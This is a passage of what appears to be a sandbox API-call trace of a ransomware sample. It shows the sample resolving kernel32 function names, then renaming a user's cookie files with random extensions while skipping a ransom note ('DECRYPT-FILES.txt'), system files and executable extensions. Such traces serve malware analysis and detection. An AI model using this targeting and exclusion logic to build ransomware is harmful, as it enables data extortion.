returned="CreateFileTransactedW" [0181.662] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.662] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.662] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.662] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.662] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.662] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.662] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.662] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.662] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.662] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.662] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.662] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.662] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.662] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.662] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.662] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.662] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.662] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.662] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.663] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.663] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.663] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.663] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.663] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.663] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.663] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.663] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.663] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.663] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.663] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.663] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.663] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.663] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.663] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.663] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.663] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.663] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.663] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.664] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.664] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.664] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.664] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.664] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.664] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.664] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.664] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.664] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.664] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.664] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.664] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.664] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.664] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.664] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.664] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.664] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.664] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.664] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.665] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.665] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.665] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.665] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.665] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.665] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.665] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.665] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.665] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.665] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.665] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.665] lstrlenA (lpString="DELETEATOM") returned 10 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.665] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.665] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.665] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.665] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.665] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.665] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.666] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.666] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.666] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.666] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.666] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.666] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.666] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.666] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.666] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.666] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.666] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.666] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.666] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.666] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.666] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.666] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.666] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.666] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.667] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.667] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.667] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.667] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.667] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.667] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.667] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.667] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.667] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.667] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.667] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.667] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.667] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.667] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.667] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.667] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.667] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.667] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.668] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.668] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.668] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1") returned 115 [0181.668] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1.CQKGY") returned 121 [0181.668] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ysxu1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.YSXU1.CQKGY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.ysxu1.cqkgy"), dwFlags=0x0) returned 1 [0181.669] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.669] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.670] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.670] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6301df20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63a15b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xab7d5ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x218, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", cAlternateFileName="5P5NRG~1.W6I")) returned 1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="DECRYPT-FILES.txt") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="autorun.inf") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="boot.ini") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="desktop.ini") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="ntuser.dat") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="iconcache.db") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="bootsect.bak") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="ntuser.dat.log") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="thumbs.db") returned -1 [0181.670] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ", lpString2="Bootfont.bin") returned -1 [0181.670] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@doubleclick[2].txt.w6IGHLZ") returned 47 [0181.670] lstrcmpiW (lpString1="w6IGHLZ", lpString2="lnk") returned 1 [0181.670] lstrcmpiW (lpString1="w6IGHLZ", lpString2="exe") returned 1 [0181.670] lstrcmpiW (lpString1="w6IGHLZ", lpString2="sys") returned 1 [0181.670] lstrcmpiW (lpString1="w6IGHLZ", lpString2="dll") returned 1 [0181.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0181.670] lstrlenW 